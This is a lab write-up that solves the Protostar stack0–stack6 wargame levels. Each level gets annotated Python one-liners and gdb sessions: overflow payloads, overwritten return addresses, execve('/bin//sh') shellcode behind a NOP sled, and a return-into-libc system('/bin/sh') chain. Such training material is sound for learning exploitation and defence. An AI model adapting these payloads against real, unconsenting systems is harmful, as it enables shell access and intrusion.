Protostar
- stack0
# stack0: send 65 bytes on stdin — one more than the buffer the program reads
# into, so the last byte spills into the variable stored right after it
# (buffer size presumably 64; confirm in stack0.c). print appends a newline,
# which the program also receives; harmless here. Python 2 syntax: on 2.x the
# parenthesised form is the same print statement and emits identical bytes.
python -c "print('a' * 65)" | ./stack0
- stack1
Frame layout (from the disassembly): main does `sub esp, 0x60`, then
buffer = esp+0x1c   (the buffer the program writes the input into)
value  = esp+0x5c   (the 4-byte variable the payload must overwrite)
value  = esp-0x60+0x5c
buffer = esp-0x60+0x1c
-------------------- subtract
distance = 0x5c-0x1c = 0x40 (64) bytes from the start of the buffer to the value,
so 0x40 filler bytes are followed by the 4 bytes that land on it.
# stack1: the payload is passed as argv[1]. 0x40 bytes fill the buffer (see the
# frame arithmetic above), then "dcba" lands on the 4-byte variable after it;
# read as a little-endian 32-bit word those bytes are 0x61626364, the value
# stack1 checks for (compare with stack1.c). The substitution is quoted so the
# payload stays one argument; for this payload (no whitespace) that is the same
# as the unquoted backticks, and the trailing newline from print is stripped
# either way.
./stack1 "$(python -c "print('a' * 0x40 + 'dcba')")"
- stack2
# list the current environment; stack2 takes its input from the GREENIE
# variable that is exported below, so this shows what the program will see
printenv
Frame layout: main does `sub esp, 0x60`, then
buffer = esp+0x18   (where the GREENIE contents are copied to)
value  = esp+0x58   (the 4-byte variable the payload must overwrite)
value  = esp-0x60+0x58
buffer = esp-0x60+0x18
------------------- subtract
distance = 0x58-0x18 = 0x40 (64) bytes, so again 0x40 filler bytes then the 4-byte value.
# stack2: the program reads its input from the GREENIE environment variable.
# Payload: 0x40 filler bytes, then 0x0d0a0d0a packed little-endian, i.e. the
# bytes 0a 0d 0a 0d.
# Trap to be aware of: command substitution strips *trailing* newlines. The
# Python output ends with ...0a 0d 0a 0d 0a (print's own newline last); only
# that final 0a is removed because the byte before it is 0d, so GREENIE keeps
# all four payload bytes. A value whose last byte were 0x0a would lose it here —
# write the payload with printf or read it from a file in that case.
# Quoting the substitution changes nothing for an assignment in bash.
export GREENIE="$(python -c "import struct; print('a' * 0x40 + struct.pack('I', 0x0d0a0d0a))")"
- stack3
Frame layout: main does `sub esp, 0x60`, then
slot at esp+0x1c   (labelled `int` in the original note)
slot at esp+0x5c   (labelled `bff` in the original note)
Distance 0x5c-0x1c = 0x40. The payload below writes 0x40 filler bytes and then a
code address, so the lower slot (esp+0x1c) must be the buffer being filled and the
higher one (esp+0x5c) the 4-byte value that receives the address — the two labels
above look swapped; check against stack3.c.
# stack3: 0x40 bytes fill the buffer, then a 4-byte code address overwrites the
# slot the program later jumps through. 0x08048424 is the address of the target
# function in this binary (a fixed, non-PIE .text address); re-derive it with
# `objdump -d ./stack3` or `p <function>` in gdb before reusing this on another
# build. print's trailing newline goes in after the address and does no harm.
python -c "import struct; print('a' * 0x40 + struct.pack('I', 0x08048424))" | ./stack3
- stack4
# stack4: no neighbouring variable this time — the filler has to reach the
# saved return address of main. Distance as worked out below:
#   0x50 - 0x10  bytes from the buffer to the end of main's frame
#   + 0x8 + 0x4  see the note after this command (0x4c = 76 bytes in total)
# followed by the target function's address 0x080483f4 (re-derive with
# objdump/gdb on any other build; it is a fixed non-PIE address here).
python -c "import struct; print('a' * (0x50 - 0x10 + 0x8 + 0x4) + struct.pack('I', 0x080483f4))" | ./stack4
Where the extra 0x8+0x4 comes from: not worked out at the time (original note: "don't know :)").
Likely explanation, to be verified in the disassembly: +0x4 is the saved ebp that sits just
below the return address, and +0x8 is alignment padding between the end of the frame and the
saved ebp (main typically re-aligns with `and esp, 0xfffffff0` after the prologue, so the
distance from `esp` to `ebp` is not just the `sub` amount). The reliable way is empirical:
send a unique cyclic pattern, read the faulting eip in gdb, and compute the offset (76 here).
- stack5
76 bytes of filler reach the saved return address (buffer plus saved ebp).
Then choose where to return. Careful: the stack addresses seen under gdb differ
from those of a normal run (gdb changes the environment size and argv[0]), so the
return address is partly a guess; running both with the same environment (e.g. via
`env -i`) narrows the gap.
To make the guess tolerant, land in a NOP sled (0x90 bytes) placed before the
shellcode: any address inside the sled slides down into the shellcode.
# stack5: return into shellcode placed on the stack.
# layout: [76 filler][return address][100-byte NOP sled][shellcode]
#   - 0xbffff800+30 is a guessed stack address that must land inside the sled;
#     it only means anything with ASLR off and shifts with the environment size.
#   - the shellcode bytes decode to execve("/bin//sh", ...): xor ecx,ecx;
#     mul ecx (eax = edx = 0); push ecx; push "//sh"; push "/bin"; mov ebx,esp;
#     mov al,0xb; int 0x80.
#   - `; cat` keeps the pipe (the new shell's stdin) open after the payload, so
#     the spawned shell reads our commands instead of getting EOF and exiting.
# print's trailing newline follows the shellcode and is never executed.
(python -c "import struct; print('a' * 76 + struct.pack('I', 0xbffff800 + 30) + '\x90' * 100 + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80')"; cat) | ./stack5
- stack6
gdb ./stack6
# stop at main's first instruction so libc is already mapped, then read
# the address of system() and the base address of the libc mapping.
# (^C is only needed to interrupt a process that is still running; once the
# breakpoint at main hits it does nothing.)
break *main
r
^C
p system
#0xb7ecffb0
info proc map
#0xb7e97000 <-> /lib/libc-2.11.2.so
# NOTE: both values are specific to this VM — they stay valid only with ASLR
# off and this exact libc build; re-derive them for any other target.
quit
# file offset of the "/bin/sh" string inside libc (-a: scan the whole file,
# -t x: print the offset in hex). Using a file offset as "offset from the
# mapping base" only works when libc's first loadable segment starts at file
# offset 0 — the `x/s` check in the next gdb session verifies that assumption.
# The pattern has no regex metacharacters, so -F matches exactly the same lines.
strings -a -t x /lib/libc-2.11.2.so | grep -i -F -- '/bin/sh'
# 11f3bf
gdb ./stack6
# second session: confirm that libc base + string offset really points at
# "/bin/sh" before trusting it in the payload (if this prints something else,
# the file offset is not the same as the mapping offset on this libc)
break *main
r
^C
x/s 0xb7e97000+0x11f3bf
# stack6: return-into-libc instead of stack shellcode (this level checks the
# return address against the stack range — verify in stack6.c).
# layout: [0x4c+0x4 = 80 filler][&system][4-byte fake return][&"/bin/sh"]
#   - the four 0x90 bytes are what system() sees as its return address; when
#     the shell exits, execution continues at 0x90909090 and the process
#     segfaults. Harmless for the exercise; for a clean exit put exit()'s
#     address (from `p exit`) there instead.
#   - both addresses come from the gdb session above and are fixed only while
#     ASLR is off and the same libc is mapped at the same base.
#   - `; cat` keeps stdin open so the spawned shell can be driven.
(python -c "import struct; print('a' * (0x4c + 0x4) + struct.pack('I', 0xb7ecffb0) + '\x90' * 4 + struct.pack('I', 0xb7e97000 + 0x11f3bf))"; cat) | ./stack6
Why the 4 bytes of 0x90 between &system and &"/bin/sh":
this is the difference between call and ret — `call` pushes a return address before
jumping, `ret` only pops eip. system() is entered via `ret`, so nothing pushed a return
address for it; on entry it takes [esp] (the next word of our payload, the 0x90s) as its
return address and [esp+4] (the word after that, the "/bin/sh" pointer) as its first
argument. Any 4 bytes work as the placeholder; exit()'s address gives a clean exit
instead of a crash at 0x90909090 when the shell closes.